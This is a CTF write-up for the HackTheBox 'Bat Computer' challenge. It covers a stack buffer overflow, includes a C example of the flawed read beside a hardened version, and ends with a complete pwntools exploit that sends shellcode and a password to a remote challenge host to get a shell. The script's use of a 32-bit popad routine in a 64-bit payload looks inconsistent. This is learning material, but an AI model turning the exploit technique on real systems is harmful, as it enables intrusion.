We covered a binary that has only PIE (Position Independent Executable) enabled as a protection, while NX is disabled. We analyzed the binary with Ghidra and GDB and discovered that it leaks the memory address of the variable used to store the user input. We also found that the binary reads up to 137 bytes of user input and stores them in a variable whose buffer size is 76 bytes, which is the core vulnerability of this app. We triggered a segmentation fault based on that and found the offset to the return address to be 84 bytes. Based on the analysis above, we built the exploitation script carrying the connection parameters and the final payload. This was part of HackTheBox Bat Computer | Intro to binary exploitation.
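To make the bug in the analysis concrete, here is an added C example (not the challenge's source, which is not shown here): a hypothetical reconstruction of the flawed read pattern, a fixed read length larger than the destination buffer, next to a hardened reader that bounds the read by the buffer's capacity. The sizes 76 and 137 are taken from the analysis above; the function names and the pipe-based self-check are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 76   /* buffer size found in the analysis */
#define READ_LEN 137  /* read length found in the analysis */

/* Flawed pattern (hypothetical reconstruction, not the challenge's code):
 * the read length is a constant larger than the destination, so any input
 * longer than BUF_SIZE bytes writes past the buffer into the saved frame. */
ssize_t vulnerable_read(int fd, char *buf /* BUF_SIZE bytes */) {
    return read(fd, buf, READ_LEN);  /* 137 > 76: out-of-bounds write */
}

/* Hardened form: the length comes from the destination's capacity, the
 * result is NUL-terminated, and the rest of the line is drained so the
 * excess cannot spill into a later read. Returns bytes kept, or -1. */
ssize_t hardened_read(int fd, char *buf, size_t cap) {
    if (cap == 0) return -1;
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0) return -1;
    buf[n] = '\0';
    if ((size_t)n == cap - 1 && memchr(buf, '\n', (size_t)n) == NULL) {
        char c;
        while (read(fd, &c, 1) == 1 && c != '\n') {}
    }
    return n;
}

/* Self-check: push READ_LEN constructed bytes through a pipe and confirm
 * the hardened reader keeps at most BUF_SIZE - 1 of them. */
ssize_t demo_hardened(void) {
    int fds[2];
    char input[READ_LEN], buf[BUF_SIZE];
    if (pipe(fds) != 0) return -1;
    memset(input, 'A', READ_LEN);
    input[READ_LEN - 1] = '\n';
    if (write(fds[1], input, READ_LEN) != READ_LEN) return -1;
    close(fds[1]);
    ssize_t kept = hardened_read(fds[0], buf, sizeof buf);
    close(fds[0]);
    return kept;
}

int main(void) {
    printf("hardened reader kept %zd of %d bytes\n", demo_hardened(), READ_LEN);
    return 0;
}
```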
Buffer Overflow Techniques Notes
The exploit code is below.
##Beginning
from pwn import *
context.binary = ELF('./batcomputer')  # sets the architecture from the binary
con = remote('157.245.39.76', 31662)
# option 1 makes the binary print the leaked address; parse the value after "0x"
con.sendline(b'1')
con.recvuntil(b'0x')
stack_base = int("0x" + con.recv().decode('latin-1').split()[0], 16)
log.success(f'stack base: {hex(stack_base)}')
# option 2, followed by the password, reaches the oversized read
con.sendline(b'2')
con.sendline(b'b4tp@$$w0rd!')
payload = asm(shellcraft.popad() + shellcraft.sh())  # shellcode at the start of the buffer
payload += b'A' * (84 - len(payload))  # padding up to the saved return address (offset 84)
payload += p64(stack_base)  # overwrite the return address with the leaked buffer address
con.sendline(payload)
con.sendline(b'3')
con.interactive()
##Ending
Video Walkthrough